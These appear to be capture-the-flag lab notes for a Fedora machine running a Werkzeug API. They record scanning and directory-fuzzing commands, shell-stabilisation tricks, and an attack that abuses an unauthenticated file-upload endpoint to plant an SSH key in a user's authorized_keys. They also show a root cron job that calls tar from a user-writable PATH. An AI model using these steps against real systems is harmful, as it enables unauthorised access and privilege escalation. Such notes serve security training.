### OS: `Fedora`

### Web-Technology: `Werkzeug`

### IP: `192.168.185.249`

### USERS: `alfredo`

### CREDENTIALS (WEB): 

### CREDENTIALS (SYSTEM-LEVEL): 

### PROOF: 

---
**Quick Scan:**

`nmap -vv -Pn -sV -sC -oA $IP"_quick" 192.168.185.249 --open`

**Full Scan:**

`nmap -vv -p- -Pn -sV -sC -oA $IP"_full" 192.168.185.249 --open`

**Directory Bruteforce:**

`feroxbuster -u http://192.168.185.249/ -t 10 -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`

`wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 "http://192.168.185.249:33414/FUZZ"`

`wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "http://192.168.185.249:33414/FUZZ/"`


---
NMAP RESULTS: 

```
192.168.185.249_full.nmap
```
---
ENUM:

`feroxbuster -u http://192.168.185.249/ -t 10 -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
```
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l       19w      137c http://192.168.185.249:33414/help
200      GET        1l       14w       98c http://192.168.185.249:33414/info
```
`uname -a`
```
Linux fedora 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```
`cat /etc/*-release`
```
Fedora release 34 (Thirty Four)
NAME=Fedora
VERSION="34 (Server Edition)"
ID=fedora
VERSION_ID=34
VERSION_CODENAME=""
PLATFORM_ID="platform:f34"
PRETTY_NAME="Fedora 34 (Server Edition)"
ANSI_COLOR="0;38;2;60;110;180"
LOGO=fedora-logo-icon
CPE_NAME="cpe:/o:fedoraproject:fedora:34"
HOME_URL="https://fedoraproject.org/"
DOCUMENTATION_URL="https://docs.fedoraproject.org/en-US/fedora/f34/system-administrators-guide/"
SUPPORT_URL="https://fedoraproject.org/wiki/Communicating_and_getting_help"
BUG_REPORT_URL="https://bugzilla.redhat.com/"
REDHAT_BUGZILLA_PRODUCT="Fedora"
REDHAT_BUGZILLA_PRODUCT_VERSION=34
REDHAT_SUPPORT_PRODUCT="Fedora"
REDHAT_SUPPORT_PRODUCT_VERSION=34
PRIVACY_POLICY_URL="https://fedoraproject.org/wiki/Legal:PrivacyPolicy"
VARIANT="Server Edition"
VARIANT_ID=server
Fedora release 34 (Thirty Four)
Fedora release 34 (Thirty Four)
```
---
BETTER SHELL:
```
python -c 'import pty; pty.spawn("/bin/bash")'
    OR
python3 -c 'import pty; pty.spawn("/bin/bash")'
    OR
/usr/bin/script -qc /bin/bash /dev/null

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp ; export TERM=xterm-256color ;	alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200
```
---
STEPS:

1. `cat /home/<USER>/.ssh/attack.pub > authorized_keys.txt`
2. `curl -L -i  -X POST -H "Content-Type: multipart/form-data" -F file="@/home/<USER>/Labs/pg-play/Amaterasu/authorized_keys.txt" -F filename="/home/alfredo/.ssh/authorized_keys" http://192.168.185.249:33414/file-upload`
3. `cat /etc/crontab`
```
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/1 * * * * root /usr/local/bin/backup-flask.sh
```
4. `cat /usr/local/bin/backup-flask.sh`
```
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
```

---
Take Away Concepts:
